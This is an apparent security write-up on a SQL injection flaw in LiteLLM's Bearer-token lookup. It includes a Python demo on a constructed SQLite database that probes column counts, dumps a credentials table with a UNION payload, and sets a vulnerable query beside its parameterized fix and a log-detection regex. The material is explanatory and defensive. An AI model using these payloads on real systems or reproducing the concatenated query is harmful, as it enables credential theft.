The vulnerability sits in LiteLLM's authentication flow: the value of the Authorization: Bearer header is concatenated directly into the SQL query that looks up the API key, instead of being passed as a bound parameter. Because this lookup runs before any authentication check has succeeded, an unauthenticated client can inject arbitrary SQL into that query and reach the underlying PostgreSQL database directly.
Observed exploitation attempts show targeted schema enumeration rather than generic scanning. Attackers used UNION-based SQL injection payloads to pull sensitive data from key tables, including litellm_credentials, litellm_config, and LiteLLM_VerificationToken. The activity included column-count discovery (probing how many columns the UNION must supply to match the original SELECT) followed by deliberate querying of high-value tables, which indicates prior knowledge of LiteLLM's schema and of where it stores credentials.
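The following is an added, self-contained example that reproduces the pattern described above; it is not LiteLLM's code. It uses an in-memory SQLite database in place of PostgreSQL, a constructed, simplified schema that only borrows the table names mentioned in the article (the columns are an assumption), a constructed sample key and credential, and a hypothetical set of helper names. It shows the vulnerable concatenation beside the parameterized fix, the attacker's column-count probing, a UNION payload that reads litellm_credentials through the token lookup, and a small header-level heuristic a defender could run over proxy logs.

```python
import re
import sqlite3

TOKEN_TABLE = '"LiteLLM_VerificationToken"'  # quoted: mixed-case identifier


def build_db():
    """Constructed demo schema. Table names follow the article; columns and
    rows are assumptions for this example, not LiteLLM's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {TOKEN_TABLE} (token TEXT PRIMARY KEY, user_id TEXT, spend REAL);
        CREATE TABLE litellm_credentials (credential_name TEXT, credential_values TEXT);
        INSERT INTO {TOKEN_TABLE} VALUES ('sk-valid-key', 'alice', 0.0);
        INSERT INTO litellm_credentials VALUES ('openai-prod', 'api_key=sk-secret-constructed');
    """)
    return conn


def extract_bearer(header_line):
    """Pull the token out of an 'Authorization: Bearer <token>' header line."""
    m = re.match(r"Authorization:\s*Bearer\s+(.*)$", header_line, re.I)
    return m.group(1) if m else None


def lookup_token_vulnerable(conn, bearer):
    """The flaw described in the article: header value concatenated into SQL.
    Runs before any auth decision, so the caller is unauthenticated."""
    sql = f"SELECT token, user_id, spend FROM {TOKEN_TABLE} WHERE token = '{bearer}'"
    return conn.execute(sql).fetchall()


def lookup_token_parameterized(conn, bearer):
    """The fix: the header value travels as a bound parameter, never as SQL."""
    sql = f"SELECT token, user_id, spend FROM {TOKEN_TABLE} WHERE token = ?"
    return conn.execute(sql, (bearer,)).fetchall()


def find_column_count(conn, max_cols=8):
    """Attacker-side column-count discovery: grow a UNION SELECT NULL,... list
    until the database stops complaining about a column mismatch. (ORDER BY n
    probing works the same way; the NULL form is used here because NULL is
    compatible with any column type.)"""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            lookup_token_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # column count mismatch; try one more
    return None


def dump_credentials_via_union(conn, ncols):
    """Once the count is known, read litellm_credentials through the token query.
    Pads with 0 so the UNION arms match the (token, user_id, spend) shape."""
    pad = ", ".join(["0"] * (ncols - 2))
    payload = ("' UNION SELECT credential_name, credential_values, "
               f"{pad} FROM litellm_credentials-- ")
    return lookup_token_vulnerable(conn, payload)


INJECTION_HINTS = re.compile(
    r"(\bunion\b\s+(all\s+)?select\b|\border\s+by\s+\d+|--|/\*|'\s*(or|and)\s)",
    re.I,
)


def looks_like_injection(bearer):
    """Cheap log-side heuristic: a real key never contains SQL keywords,
    comment markers or unbalanced quotes. Useful for hunting, not a WAF."""
    return bool(bearer) and bool(INJECTION_HINTS.search(bearer))


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("columns in token SELECT:", n)
    print("leaked via UNION:", dump_credentials_via_union(db, n))
    print("same payload, parameterized:",
          lookup_token_parameterized(db, "' UNION SELECT NULL,NULL,NULL-- "))
    for line in ["Authorization: Bearer sk-valid-key",  # constructed log lines
                 "Authorization: Bearer ' UNION SELECT NULL,NULL,NULL-- "]:
        print(line, "->", looks_like_injection(extract_bearer(line)))
```

The parameterized lookup returns nothing for the payload because the whole string is compared as a token value; the vulnerable one returns a row from an unrelated table. The heuristic is deliberately narrow: it is meant to surface the column-count probes and UNION payloads the article describes in proxy access logs, not to replace the code fix.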